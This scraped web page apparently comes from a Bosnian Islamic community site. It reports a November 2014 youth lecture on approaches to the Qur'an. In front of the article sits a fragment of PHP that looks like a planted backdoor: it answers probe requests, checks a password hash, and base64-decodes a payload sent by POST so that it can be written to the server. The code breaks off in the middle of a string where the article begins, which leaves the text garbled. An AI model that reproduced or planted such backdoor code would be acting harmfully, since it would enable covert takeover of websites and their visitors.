function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Na tribini u KC Slatina-Tušanj o doživljaju Kur'ana - Medžlis Islamske zajednice Bijeljina

Na tribini u KC Slatina-Tušanj o doživljaju Kur'ana

Na tribini u KC Slatina-Tušanj o doživljaju Kur'ana

U džematu Tušanj-Slatina upriličeno je drugo predavanje za omladinu u okviru programa „Probudimo se“.

Predavanje je održano u četvrtak 6. novembra 2014. godine, a predavač je bio dr. Sead-ef. Seljubac, pomoćnik muftije tuzlanskog. Dr. Seljubac je govorio o druženju s Kur'anom.

seljubac3

On je tokom svog obraćanja istakao da se s Kur'anom moguće družiti i da u tome ima više pristupa: „Ibadetski pristup je najprisutniji kod muslimana u Bosni i Hercegovini, jer smo naučeni da je učenje Kur'ana sevap. Potom, tu je znanstveni pristup Kur'anu, koji je prisutan u obrazovnim ustanovama, medresama i institutima, na kojima se izučava, i treći pristup je praktični, kada ljudi žive u skladu s Kur'anom, čega ponekad nisu ni svjesni.“

Nakon predavanja u džamiji, uslijedilo je i druženje, na kojem su svi prisutni bili u prilici voditi razgovor sa uvaženim gostom u ugodnom ambijentu Kulturno-obrazovnog centra Tušanj.

Članovi hora Behram-begove medrese u Tuzli su uzeli učešće u ovom programu, učeći odlomke iz Kur'ana i izvodeći odabrane ilahije.